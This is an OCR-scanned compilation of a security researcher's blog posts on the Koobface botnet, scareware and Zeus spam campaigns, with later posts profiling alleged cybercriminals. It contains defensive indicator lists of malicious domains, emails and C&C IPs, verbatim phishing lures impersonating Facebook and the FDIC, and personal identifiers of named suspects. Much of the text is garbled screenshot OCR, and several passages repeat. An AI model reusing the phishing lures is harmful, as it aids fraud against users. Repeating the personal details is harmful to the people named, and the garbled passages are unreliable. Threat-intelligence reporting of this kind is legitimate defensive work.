Pa ddresses from C&C Of 


Psi KOOBFACE C&C 
vs 


4 
Retrieve commands from C&C 


ae 
Pa se Kootdece pombe 
Retrieve subsequent Sayee 
2 commands and at o- 
_E-components using zombies 
_— as proxy 
Affected User Mw tee | ones 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the security industry,’ the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted‘ 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware’s domain activities 


(2009-07-22 20:24:17) 
#We express our high gratitude to Dancho Danchev (http://ddanchev.blogspot.com) 


#for the help in bug fixing, researches and documentation for our software. 


I’d like to thank the folks at [1]TrendMicro for mentioning the message inserted by the 
Koobface gang ([2]more love [3]on a first-name basis [4]from them) within their command 
and control infrastructure for nine days, [5]greeting me for systematically [6]kicking them out 
of their ISPs, and suspending their command and control domains, in a new report entitled 
[7]The Heart of Koobface - C &C and Social Network Propagation: 


"This simplistic C &C approach is, of course, very vulnerable to takedowns. After sev- 
eral KOOBFACE C &C takedown attempts initiated by Internet service providers (ISPs) and 
members of the security industry, the KOOBFACE gang realized the need for a more robust C 
&C infrastructure. 


Thus, on July 19, 2009, the KOOBFACE writers implemented a new C S&C architecture 
that involved the use of proxy nodes to provide redundancy and to improve the survivability 
of their C &C should another takedown be attempted. A few days after the new KOOBFACE C 
&C infrastructure was implemented, the botnet was seen inserting a message (see below) for 
one of the security researchers tracking the malware’s domain activities. 
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This message run lasted nine days from July 22 to July 30, 2009. Based on this incident, 
we can safely assume that the KOOBFACE gang has been monitoring blogs, articles, write-ups, 
and analyses about their handiwork and was probably also keeping tabs on the various 
solutions deployed to counter the botnet’s attacks. Second, these people were thus quick to 
act and fix their creation’s weaknesses, as evidenced by its change in infrastructure. Finally, 
the botnet’s creators were bold enough to send taunting messages to security researchers." 


Having the Koobface gang kicked out of their ISPs in 48 hours through close cooperation 
with China’s CERT; BlueConnex Ltd; PacificRack.com; Oc3 Networks & Web Solutions Lic; 
Telos-Solutions-AS/Telos Solutions LTD, resulted in a single command and control domain 
which was active and using the services of UKSERVERS-MNT (AS42831), 78.110.175.15 in 
particular. Simply put, the Koobface botnet and the hundreds of thousands of infected hosts 
were not just sitting ducks, but ducks who’ve fallen asleep in the middle of the hunting season. 


It’s important to point out that the company (UKSERVERS-MNT) on purposely lied that the 
customer has been taken offline, allowed the Koobface gang to access the server since 
the gang claimed "it’s a compromised customer and needs to clean-up the mess", then on 
purposely stopped responding to the smoothly going data sharing process, thereby allowing 
the Koobface gang to put their contingency plan in place. 


The bottom line - based on already published and to-be published assessments of this 
group’s activities, the Koobface botnet [8]appears to be only the [9]tip of the iceberg for 
the [10]Ali baba and the 40 thieves cybercrime enterprise - a self-describing [11]message 
included by the Koobface gang. Their activities also prove a point - a single cybercrime 
enterprise can efficiently and automatically dominate the entire Web 2.0 threatscape, if they 
want to. 
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5.10.6 Scareware Serving Conficker.B Infection Alerts Spam Campaign 
(2009-10-20 18:51) 


\ : | Antivirus Pro 2010 


Virus Alerts 


W532. Trojan. Downloader. s 
WI2. Backdoor. 
Worm.Chernoby.6 
W3I2.FieDeleter.£2.5 


Worm. Trojan.OfficeWorm.k 


of-the-art monitoring and protection 
moder, Antivirus Pro 2010 is the only 
security software you need for your 


Spyware. Wather.tc ene ee ee ro? 
a ~ ~ users rus Pro is your + 
Spyware.CreditCarder.y saussrta inuatacei tei Download now ly 
Adware. Clicker,P2.¢ 


Adware. TrojarFactory.f 
Spyware. Zob.di 


Threats © Protect senative dats once aed fee all 


i?) How Antivirus Pro 2010 can help you? 


With Antivirus Pro 2010 you have your system cleaned from stile maware 
stimanials Mections, pro 
security alerts, Combining outstanding cleaning capabtit 
constantly expanding database of adware and mahware types and 3 sogtitsticated, 
highly Ntefigent detection module Antivirus Pro 2010 has everything to become your 


ted agemst current intrusions and rote ecured aginst future 
with an extensive, 

| surf the web from home 4 lot, and 
that's where | am not protected by 
tech and security guys tke in the 


office. | found that Antivirus Pro 2010 comprehensive home ute security solution in the modern work MAGAZINE 
perfectly matches my needs, and I've oe sad ea — he : E DITORS’ 
been & happy uter since the first tine | Antivirus Pro 20 chemlogy guards you agsinct known, documented dangers and : . 
histaled it. No adware, nO Dopp, emerging, previc ‘known types, its real-time monitor detects and wards off CHOICE 
nothing tke that mamwere attacks and hacking attempts while the removal mod.te uses the huge 

Roger i dediiialle Spyware Gstabace to clean your system from ary kind of infection 

Being not too computer savvy at af, | 7) bs spyware really dangerous? 


st@ reatized I've got to protect myself 

agerst af the dangers of m 
it somehow. Antivirus Pro 2010 Spyware t& today’s most takec about security issue taking mary forms from 

st what | found perfect, 4 relatively harttiess’ spam scripts which food your computer with ad popups and 

vice load of features wrapped into an unsolicited emats to serious virustike programs which steal your private information 

easy to understand interface. I've 

fever wanted to find another program 


tke passwords and credit card Getats 


A fake [1]"conficker.b infection alert" spam campaign first observed in April, 2009 (using 
the following scareware domains antivirus-av-ms-check .com; antivirus-av-ms-checker .com; 
ms-anti-vir-scan .com; mega-antiviral-ms .com back then) is once again circulating in an 
attempt to trick users into installing "antispyware application", in this case the [2]Antivirus Pro 
2010 scareware. 


This campaign is directly related to [3]last week’s Microsoft Outlook update campaign, 
with both of these using [4]identical download locations for the scareware. 


The following is an extensive list of the domains involved in the campaigns: 
abumaso3tkamid .com - Email: drawn@ml3.ru 

afedodevascevo .com - Email: sixty@8081.ru 

alertonabert .com - Email: flopo@infotorrent.ru 

alertonbgabert .com - Email: vale@e2mail.ru 

alioneferkilo .com - Email: va@blogbuddy.ru 

anobalukager .com - Email: chalkov@co5.ru 

anobhalukager .com - Email: humps@infotorrent.ru 

bufertongamoda .com - Email: kurt@8081.ru 
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vuilerdomegase .com - Email: leaf@corporatemail.ru 
vuilleskomandar .com - Email: seize@e2mail.ru 
vulertagulermos .com - Email: dealt@8081.ru 
vuretronulevka .com - Email: dealt@8081.ru 
weragumasekasuke .com - Email: kazoo@isprovider.ru 
werynaherdobas .com - Email: dealt@8081.ru 


Despite the comprehensive portfolio of domains used, relying on spam to increase rev- 
enue from scareware sales is prone to fail, in this specific case due to the lack of event-based 
social engineering theme, something that was present in the first campaign. 


Related posts: 
[5]Conficker’s Scareware/Fake Security Software Business Model 
[6]Koobface Botnet’s Scareware Business Model 


This post has been reproduced from [7]Dancho Danchev’s blog. 
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2. 
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4. http://blog. purewire.com/bid/21391/Fake-Microsoft-Outlook-Updates-Spread-Rogue-A 
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5.10.7 Koobface Botnet Redirects Facebook’s IP Space to my Blog (2009-10-21 22:28) 


Network Location: 21 2009 - Oct 21.2 
pa labil Ls Oct 21, 2009 - Oct 21, 2009 
* Visits a | (Blow | 


October 21, 2009 


6,705 visits came from this network location via 1 network locations 


Goal Corrversion | @l=ltiile 
Visits Pages/Visit Avg. Tiene on Site % New Visits Bounce Rate 
6,705 1.00 > 00:00:00 99.99% 99.96% 
(sa tal 93.63 te Ava: 1,06 (5.75%) ' 00-00-16 (.99.44% t 97.24% (2.83%) te Avg: 98.31% (1.67%) 
m tetwork Location Y Visits + Pages/Visit Avg. Tite on Ste % New Vists Bounce Rate 
1 tecebook inc 6,705 100 » 00.06.00 BIS% 99.95% 


Love me, love me, say that you love me. You know you’re cherished when the Koobface botnet 
redirects Facebook Inc’s entire IP space to your blog using HTTP Error 302 - Moved temporarily 
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messages in an attempt to have Facebook’s anti-malware crawlers hit my blog every time 
they visit a Koobface URL posted on the social networking site. 


> wget http://artquide.co. sop os -php 
fl 267, 


Resolving artquide.co.il... 62.128.52.211 
Connecting to artquide.co_il[62.128.52.211]}:80... connected 
HTTP request sent, awaiting response... 302 Found 


Location nt. {/ddanchev.blogspot.com/ [following 
| AY) 


Resolving ddanchev.blogspot.com... 74.125.19.191 
Connecting to ddanchev_blogspot.com[74.125.19 connected 
HTTP request sent, awaiting response... 200 OK 

: ied [t 


The result? Earlier this morning, I’ve noticed over 7,000 unique visits coming from Facebook 
Inc’s IP space using active and automatically blogspot accounts part of the Koobface botnet 
as http referrers ([1]New Koobface campaign spoofs Adobe’s Flash updater), which is now 
officially [2]relying on already infected hosts for the CAPTCHA recognition process. At first, | 
thought the Koobface gang has embedded an iFrame in order to achieve the effect, but the 
requests were coming from Facebook's IP space only. 


A representative from Facebook’s Security Incident Response Team just confirmed the 
development, and commented that they’ve added an exception, which is now visible since IPs 
from Facebook’s IP space are no longer visiting my blog: 


"Thanks for bringing this to our attention. I’m on the Security Incident Response team 
at Facebook and we just finished looking into this issue. We visit all links posted to Facebook 
as part of our link preview feature. We also take the opportunity to do some additional security 
screening to filter out bad content. Koobface in particular is fond of redirecting our requests 
to legitimate websites, and you seem to have done something to piss Koobface off. All visits 
to Koobface URLs from our IP space are currently being redirected to your blog." 
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C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 


protocol 
4 
/ Retrieve commands and 
Pe 1 KOOBFACE zombie computers’ IP 
a ddresses from C&C Pa 


Fu KOOBFACE C&C 7 koosrace coc 


fo 


” af 
Retrieve commands from C&C 


4 


ss 
et, 
a 
a ~ Kocttace pombe 
Retrieve subsequent ~ Sayan 
2 commands and = = 
_E-comnponents using zombies 
-_— as proxy 
Affected User Alero | nee 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the security industry? the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted‘ 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware’s domain activities 


(2009-07-22 20:24:17) 


#We express our high gratitude to Dancho Danchev (http://ddanchev.blogspot.com) 


#for the help in bug fixing, researches and documentation for our software. 


The Koobface gang’s use of basic blackhat SEO principles such as content cloaking are identical 
to their previous attempts to cover-up their malicious activities relying on pre-defined sets of 
http referrers of public search engines, or particular redirectors in order for their infections to 
take place. 


Stay tuned for more developments on the [3]Ali Baba and the 40 thieves LLC front, a.k.a 
as [4]my Ukrainian "fan club". The circle is almost complete, a lot of recent events will be 
summarized shortly. 


Related posts: 

[5]Koobface Botnet Dissected in a TrendMicro Report 
[6]Koobface Botnet’s Scareware Business Model 
[7]Movement on the Koobface Front - Part Two 
[8]Movement on the Koobface Front 

[9]Koobface - Come Out, Come Out, Wherever You Are 
[10]Dissecting Koobface Worm’s Twitter Campaign 
[11]Dissecting the Koobface Worm’s December Campaign 
[12]Dissecting the Latest Koobface Facebook Campaign 
[13]The Koobface Gang Mixing Social Engineering Vectors 


This post has been reproduced from [14]Dancho Danchev'’s blog. 


1. http: //blogs.zdnet .com/security/?p=4594 
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. http://ddanchev. blogspot . com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 


http: //ddanchev.blogspot . com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 


_ http: //adanchey blogspot .con/2009/09/koobface- botuets-scarevare-business. html 
_http://adanchev blogspot .con/2009/06 /novenent-on-kocbface-front~part two heal 
_ http: //adanchey blogspot .con/2009/08/novenent~on-kovbface-front. nt 
_hetp://adanchev blogspot .con/2009/0T /koobface- cone out-cone~out-wherever=you, ht 
10, http: //ddanchev. blogspot .con/2008/07/dissecting-oobface-vorns-tvitter htm 


11. http://ddanchev. blogspot .com/2008/12/dissecting-koobface-worms- december .htm 
12. http://ddanchev. blogspot .com/2008/11/dissecting-latest-koobface-facebook. htm 


13. http://ddanchev. blogspot . com/2008/12/koobface-gang-mixing-social-engineering. html 


14. http://ddanchev.blogspot.com/ 


5.10.8 Koobface Botnet Redirects Facebook’s IP Space to my Blog (2009-10-21 22:28) 


Network Location: 21. 2009 - Oct 21.2 
pd lebidds Oct 21, 2009 - Oct 21, 2009 


October 21, 2009 


6,705 visits came from this network location via 1 network locations 


Goal Comrversion Fle = lt) 
Visits Pages/Visit Avg. Time on Site % New Visits Bounce Rate 
6.705 1.00 > 00:00:00 99.99% 99.96% 
% of Site Total 93.63 wo 1,06 (-5,.75%) ‘ 00:00:16 (-99.44%) te Avg 97.24% (2.83%) te Avg: 98.31% (1.67%) 
© Metwork Location y Visits | Pages/Vist Avg. Tine on Ste % New Vists Bounce Rate 
1. facebook inc 6,705 100 » 00.0000 99.59% 99.95% 


Love me, love me, say that you love me. You know you’re cherished when the Koobface botnet 
redirects Facebook Inc’s entire IP space to your blog using HTTP Error 302 - Moved temporarily 
messages in an attempt to have Facebook’s anti-malware crawlers hit my blog every time 
they visit a Koobface URL posted on the social networking site. 
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> wget http://artquide.co.il/267/g_php 
13:34 25- ll de.co.il/267/ 


> g-php 
Resolving artguide.co.il... 62.128 52.211 
Connecting to artquide.co il[62.128.52.211]}:80... connected 
HTTP request sent, awaiting response... 302 Found 


Seton http:// ‘ddanchev blogspot ca a 
-- -- hev.bl 


connected 


The result? Earlier this morning, I’ve noticed over 7,000 unique visits coming from Facebook 
Inc’s IP space using active and automatically blogspot accounts part of the Koobface botnet 
as http referrers ([1]New Koobface campaign spoofs Adobe’s Flash updater), which is now 
officially [2]relying on already infected hosts for the CAPTCHA recognition process. At first, | 
thought the Koobface gang has embedded an iFrame in order to achieve the effect, but the 
requests were coming from Facebook's IP space only. 


A representative from Facebook’s Security Incident Response Team just confirmed the 
development, and commented that they’ve added an exception, which is now visible since IPs 
from Facebook’s IP space are no longer visiting my blog: 


"Thanks for bringing this to our attention. I’m on the Security Incident Response team 
at Facebook and we just finished looking into this issue. We visit all links posted to Facebook 
as part of our link preview feature. We also take the opportunity to do some additional security 
screening to filter out bad content. Koobface in particular is fond of redirecting our requests 
to legitimate websites, and you seem to have done something to piss Koobface off. All visits 
to Koobface URLs from our IP space are currently being redirected to your blog." 
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C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 
protocol 


Retrieve commands and 0 
1 KOOBFACE zombie computers’ IP 


- / ; 
/ 
ot - d ‘< Kocttace pombe 
Retrieve subsequent ~ aapen 


2 commands and = = 
_E components using zombies 


— as proxy 


KOOBFACE C&C 


Retrieve commands from C&C 


So 


Affected User Mew tw) | ne 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the secunity industry,’ the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted‘ 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware’s domain activities 


(2009-07-22 20:24:17) 


#for the help in bug fixing, researches and documentation 


The Koobface gang’s use of basic blackhat SEO principles such as content cloaking are identical 
to their previous attempts to cover-up their malicious activities relying on pre-defined sets of 
http referrers of public search engines, or particular redirectors in order for their infections to 
take place. 


Stay tuned for more developments on the [3]Ali Baba and the 40 thieves LLC front, a.k.a 
as [4]my Ukrainian "fan club". The circle is almost complete, a lot of recent events will be 
summarized shortly. 


Related posts: 


[5]Koobface Botnet Dissected in a TrendMicro Report 
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facebook = account Update @ 


My Account 


In an effort to make your online experience safer and more enjoyable, Facebook wil be inplemerting 4 new 

login = vl affect all Pacebook users sriges well offer new Features and increased account 
sourky uJ are able to use the new login system, you wil be required to update your accoury 

A new Fac ydste Tool has been released For your accourt. Please downlosd and install the tool using 
the link below 


Facebook Update Tool 
updatetooLexe 


Email 


UPDATED - Wednesday, October 28, 2009: A "New Facebook Login System" spam campaign is 
in circulation, launched by the same botnet. Sampled [1]updatetool.exe once again interacts 
with the Zeus command and control at [2]193.104.27.42. 


Message sample O01: "/n an effort to make your online experience safer and more enjoy- 
able, Facebook will be implementing a new login system that will affect all Facebook users. 
These changes will offer new features and increased account security. Before you are able 
to use the new login system, you will be required to update your account. A new Facebook 
Update Tool has been released for your account. Please download and install the tool using 
the link below." 


Message sample 02: "Dear Facebook user, In an effort to make your online experience 
safer and more enjoyable, Facebook will be implementing a new login system that will affect 
all Facebook users. These changes will offer new features and increased account security. 
Before you are able to use the new login system, you will be required to update your account. 
Click here to update your account online now. If you have any questions, reference our New 
User Guide. Thanks, The Facebook Team" 
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New DNS servers of notice: 
ns1.a-recruitmnt .com 
nsl.applesilver .com 
nsl.cheryks .com 
nsl.barbaos .net 
nsl.laktocountry .net 


An ongoing [3]spam campaign impersonating The Federal Deposit Insurance Corporation, 
is attempting to drop zeus samples by enticing users into installing [4]pdf.exe and [5]word.exe. 


"Subject: FDIC has officially named your bank a failed bank 
Body: You have received this message because you are a holder of a FDIC-insured bank 
account. Recently FDIC has officially named the bank you have opened your account with as 


a failed bank, thus, taking control of its assets. You need to visit the official FDIC website and 
perform the following steps to check your Deposit Insurance Coverage." 
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iF FEDERAL DEPOSIT 
INSURANCE CORPORATION 


eA 


OMB Number: 0164013 
Expiration Date Tuesday, January 27, 2010 


Personal Insurance File 


FDIC has officially named the bank you have opened your account with a failed bank, thus, taking control of 
its assets. 


¢ Download and open your personal FDIC Insurance file to check your Deposit Insurance Coverage 
e The data in each file is self-extracting: download the file into an appropriate directory, and then run it 


[ tst—“‘s‘s*s*s*™*C‘*é ide Title Ss s—<“<*‘;*;*;*C*Y*SC*éR I Number =| File size 


Personal FDIC Insurance file FDIC 5210/09E 
® PDF 


A 105 kb 
Micr ® Word fil 105 kb 


FDIC 642204 (10-09) 


Last Updeted Tuesday, October 27, 2008 


Home ContactUs Search Help SiteMap Forms 
Freedom of Information Act (FOIA) Semice Center Website Policies USA gov 
FDIC Office of Inspector General 


Sampled malware obtains a Zeus crimeware from a known command and control location 
(193.104.27.42), already [6]blacklisted by the Zeus Tracker. The campaign is related to the 
periodical "Microsoft Outlook Update" campaigns, since both campaigns have been [7]sharing 


fast-flux infrastructure under the same infected hosts, using identical domains. 


Fast-fluxed domains participating in the FDIC spam campaign: 
bbttyak.co .uk 
bbttyak.org .uk 
bbttyam.co .uk 
bbttyam.me .uk 
bbttyap.co .uk 
bbttyap.me .uk 
bbttyaz.co .uk 
bbttyaz.me .uk 
gerrahawa .eu 
gerrahowa .eu 
gerrakawa .eu 
gerrakowa .eu 
gerralowa .eu 
gerraoowa .eu 
gerraoowa .eu 
gerrasasa .eu 
gerrasase .eu 
gerrasasq .eu 
hilerfae .eu 
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nsl.asthomes.com 


nsl.cerezit.net 
65.60.0.0/18 ————“S-ge s32475 


nsl.doctor-tomb.com 65.60.6.176 


vps.sh.servebyte.com 


nsL.racing-space.net 


nsL.ropins.com 


DNS servers of notice: 
nsl1.doctor-tomb .com 
ns1.sortyn .com 
nsl.asthomes .com 
nsl.sunriseliny .com 
ns1.racing-space .net 
nsl.cerezit .net 


The phoneback location 193.104.27.42 at AS12604 maintained by Kamushnoy Vladimir 
Vasulyovich (info@ctgm.info; via.kam@ctgm.info with ctgm.info responding to 91.213.72.1) is 
the second Zeus command and control IP within the netblock, [8]followed by 193.104.27.90. 


Related posts: 

[9]Fake Microsoft patches themed malware campaigns spreading 
[10]Fake Microsoft patch malware campaign makes a comeback 
[11]The Multitasking Fast-Flux Botnet that Wants to Bank With You 
[12]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[13]Managed Fast Flux Provider - Part Two 

[14]Managed Fast Flux Provider 

[15]Storm Worm’s Fast Flux Networks 

[16]Fast Flux Spam and Scams Increasing 

[17]Fast Fluxing Yet Another Pharmacy Spam 

[18]Obfuscating Fast Fluxed SQL Injected Domains 

[19]Storm Worm Hosting Pharmaceutical Scams 

[20]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 


This post has been reproduced from [21]Dancho Danchev’s blog. 


i, 
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7. 
8. https://zeustracker.abuse.ch/monitor .php?host=193.104.27.90 

9. 

10. 

11. 


13. http://ddanchev. blogspot .com/2008/10/managed-fast-flux-provider-part-two.htm 
14. http://ddanchev. blogspot .com/2007/11/managed-fast-flux-provider.htm 
15. http://ddanchev. blogspot .com/2007/09/storm-worms-fast-flux-networks.htm 


. http://ddanchev. blogspot .com/2007/10/fast-flux-spam-and-scams-increasing.htm 


17. 
. http://ddanchev. blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected.htm 

19, 

20. 

21. 


5.11 November 


5.11.1 Summarizing Zero Day’s Posts for October (2009-11-02 23:29) 


ZPNet Search: a 


Home News & Blogs Videos White Papers Downloads Reviews Popular 


Ryan Naraine and Dancho Danchev 
ote Peas OB tere Ae 


Pick a blog category bs | vw 


ZDNet Must Read: 
Ransomware encrypts files, demands $100 
Securky researchers have intercepted a mew farsomware vanant 


ernrypting popular fle extersions and demanding a $100 for the decrypton 


software. Continued Popular Sanity 


Saver Videos 
October 29th, 2009 a 
Phishing experiment sneaks through Mgyt eee 
all anti-spam filters a ue 
[fll Elve stems that 
[fen] = Ou aren't cut ont 


= t = septal esas te bea CIO 
Tope Antranem, Linkedin & os Cuherttesta 


aS [Seta Sponsored Links 


wien 


aly 52 TalkBacks 


Trojan Remover Download 

= A recently comdxted ethecal pheshing pion Le ase a : soy of the Best 
» ‘ 2 r 10- Spyware, Rated S Stars : 

= Leadership vs, 


tu » the dyrva sof 
ee ee Free iAntiVirus Download ay Bl 


impersonating Lkedin by masking Protects OS X from Virus Threats differences 
invitaters comeing from BM Gates, has Download Real-Time Protection Now! 
ateeved a 100% success rate 
bypassing the anti-spam fikers & was 
tested agarnt 


The experment emphanzes on how small-scale spear phishing campangrs 

are capable of bypassing arti-spam fiters, amd orxe agamn proves that Recent Entries Eive ways to lead 

users continue rtersctog wth phishing emo your team to peak 
performance 

More wfo on the methodology used 


Read the rest of thes entry » 


October 29th, 2009 
am... . 1... T¥.13 ..... -- 
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If you truly need and want the complete URL list drop me a line at dancho.danchev@hush.com 


. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEi_y7PHZMGckGNRhcniYySxXC_qHRqAvEqubh6uBVENJiawe 
"https //blogger. googleusercontent.con/ing/b/825v2Z2n1/AVwXsEj QF tx0KB 7s 9XHG-Jelg- TRF rO0T ehgh¢pLp-WSUGKEZ 


PINE PB 


WwW 


> 


19.5 May 


19.5.1 Exposing the Ukrainian Insider Trading Hackers that Stole $30M Using a 
SEC’s EDGAR Securities Fraud Scheme - The Technical Details - Exclusive 
(2023-05-01 13:23) 


hs ae 

[1] . 

"An OSINT conducted today is a tax payer’s buck saved somewhere". 

Official U.S Secret Service [2] $1M reward listing on [3]U.S Secret Service’s Most Wanted Cy- 
bercriminals List for "[4]Oleksandr Vitalyevich leremenko". 

Handle: Zl0m; Lamarez; Ded.MCz; |@m@rEz 


Email: lamarez@mail.ru; uaxakep@gmail.com - xeljanzusa.com - 62.109.25.228 
(https://www.secureworks.com/research/point-of-sale-malware-threats); 62.109.1.69 
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uaxakep@gmail.com 


xeljanzusa.com 
[5] 


Commpany: 2016 K3epoxkc 

Phone: +7 951 3661717 

ICQ: 123424 

Web Money: 258807111393 

Related URLs: 
hxxp://ageline.ru/lamarez.php 
hxxp://kOx.ru/md5.salt.tx 

hxxp://kOx.ru/ _bot.exe - 82.146.60.59 
hxxp://kOx.ru/black energy _31337 /stat.php 
http://kOx.ru/siicywu36dswh/addddos.php 
hxxp://xtoolz.ru 

hxxp://cup.su 


hxxp://xwarez.us 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEiRnzwKkaQ8VexF 1mDf 3NTOjvLDSCpkceYKIu4h1VSHK3£Qdo 
EHX19BhQj3BK1VVypohCIf6bjO0qlh3hxufo5DVi99yc5Fdaxj8vl1te 
2 


ttps://www. justice. gov/usao-nj/pr/nine-people-charged-largest-known- computer-hacking-and-securities-fra 


3. https://www. justice. gov/usao-nj/pr/two-ukrainian-nationals-indicted-computer-hacking-and-securities-fra 
i Se NT Te TTT 
5 
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19.5.2 Who’s Behind the Butterfly Bot/DCI Bot/DownTroj/Aspergillus Botnet Mali- 
cious Software? (2023-05-02 20:17) 


[1] 


@ @ @ 


leniqi.mentor@siol.net wg.fatal@gmail.com addresshamleti 91 7@hotmail.com 


4 fim, A i, 
deepbluesecurity.nl voc.cash 


[2]Awesome. 
Emails known to have been involved in the campaign include: 
iserdo@gmail.com 
toadmin@1337crew.info 
wg.fatal@gmail.com 
emailedgov.hacN@gmail.com 
admin@1337crew.info 
jernej 5@hotmail.com 
usediserdo@gmail.com 
toiserdo@gmail.com 
schlist90210@gmail.com 
Waisted.time@hotmail.com 
addressnetNairo@hotmail.com 
betweennetNairo@hotmail.com 
hamlet1917@hotmail.com 
addresshamlet1917@hotmail.com 
withhamlet1917@hotmail.com 
floxter@hotmail.com 
ice@iceman.in 
addressleniqi.mentor@siol.net 
lenigi.mentor@siol.net 
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accountiserdo@gmail.com 
addressicemangjN@hotmail.com 


Sample screenshot: 


[3] 


@ @ @ 


floxter@hotmail.com leniqi.mentor@siol.net wg.fatal@gmail.com 


Zany Zany Zan 
eo ®& @) 
4am) deepbluesecurity.nl voc.cash intelhub.link 
@) 
threatforce.net Zany 4am 
@) @) 


erc20collector.com b2bradio.net 


Related domains: 
hxxp://voc[.]cash 
hxxp://deepbluesecurity[. Jnl 
hxxp://erc20collector[.]Jcom 
hxxp://b2bradio[.]net 
hxxp://threatforce[.]net 
hxxp://intelhub[. ]link 


Related screenshots: 


[4] 
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@ @ @ 


floxter@hotmail.com lenigi.mentor@siol.net hamlet1917@hotmail.com 


®) ® 


tamiflux.net tamiflux.org 
25811cec3daedb4386a541 a8ca46e382 ae 
2] 


MSSRV32.EXE 


Related screenshots: 


[5] 
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@ @ 


ice@iceman.in addresshamlett 917@hotmail.com 


‘\ 


® 


®) 


® 


albaname.com albaname.net mpuq.net 


Zan) 
@) 
albahostnet 
Related domains: 
hxxp://voc[.]cash 
hxxp://deepbluesecurity[. Jnl 
hxxp://erc20collector[.]Jcom 
hxxp://b2bradio[.]net 
hxxp://intelhub[. ]link 
hxxp://albahost[.]net 
hxxp://albaname[.]Jcom 
hxxp://mpug[.]net 
hxxp://aloaname[.]net 
hxxp://threatforce[.]net 
hxxp://tamiflux[.]net 
hxxp://tamiflux[.lorg 
Sample screenshot of Voc Cash: 


[6] 
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@ 


schlist90210@gmail.com 


ime connect with us wi > 2 Tei ow 


1. fit tpe:/ blogger. googlousercontent. con/ing/b/R29v22:1/AVWKeEj6veKaxjaya35 jeahPuGLqShVAOOv_SSIBKTyTPuARCN 
2, hetpa://aww. justice. gov/opa/ti16/690811,/ dovnload 
3, https: / blogger. googleusercontent .con/ing/b/R29vZ2x1/ AVwKsE jbknk@ovr40iKOSFEEVaN21e~aGbVidschy TOP jXGRBILuz 


4. https: //blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEiaq6LvCWsNjPesx3M68RC7SDEOKBIPtdk9hmescakKv4E80 
5, https: //blogger. googleusercont ent .con/sng/b/R29v72x1/ NVWRsESH-DeRerDRxScOej8-69¥yRqLIMGc_9jAuPGpOSEEMGLK 
6. https: //blogger .googleusercontent . com/img/b/R29vZ2x1/AVVXsEj3Br jzNAIt411QhpgBi7laZDxb4mhOF 1VLvezr7hcZ73-10 


io) 


19.5.3 How Do Cybercriminals Manage Compromised Hosts Using Desktop Manage- 
ment Applications? - An Analysis (2023-05-03 19:42) 


he 


[1] 
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HacTpovent Cost apexaTope par zenee: 4a apa paagena : Connections « Modules 
Deny connections 


Mpseune ane 
Lanes dst_addr dst_mask [op dst_port] 


[-=wsertist]) ~ MecEnaTemseioe None - COHCOK NOMzoRaTeNed CHcTeMe 
te xa megs Epona (narpemep: a 
(arpreep: 5 


Nocne peaacposadina moGes none HeofoaHmo HaxaTe morky | Apply [wrote 
VOMEHEHICR BCTYMHRM B Only HeMeAnEHHO, wn [Undo] = Ana OTHENE! CABnaeee 


If an image is worth a thousand words then check out the following which although released 
in 2006 appears to be one of the cybercrime ecosystem’s most sophisticated and advanced 
compromised hosts management tool within the ecosystem up to present day. 


Sample screenshots include: 


[2] 
27650 


Knwent. Konanaei. (Tonbko ana yposHa admin) 


KMWEHT NORBORART OTTDAR MATS KOMAH Ab! GOTAM Ht NONY UAT PER YTeTaTe! Hr BRINONHEHCR 


6 PRaTEHOM Bpeneret, Komaruee MoryT Certs C napameTpamn 1 Ges napameTpoe. Kpome sie =) Disconnect Acoma: 8 XSOX 
STOO BC Te HAG BAPSHES ONPEAEMEHHEEK KOMBHA, KDTOpEH HawHHGIOTCR C CAMEOS cal Port ai 

STOURS® 1 AOC TYMees “Epes KONTeNCTHO® Memen creeice GoTos (pummel KreK He Creecee) a" wel 

PING > OTAPAOM Te 2”0-RaNpod Pere My wD ™ 

RUN ~ RAEPYIMTS 4 BRINONMHTS (Dadin Nepe Aaeeet KNHTOM - ——- 

RUN [Daas] - AMY CK@ET Tak ne yeaaaHie NapaMeTpOR ANA RanyCK@eMoro Qaing Use Selected | [reg | WM Tes | 

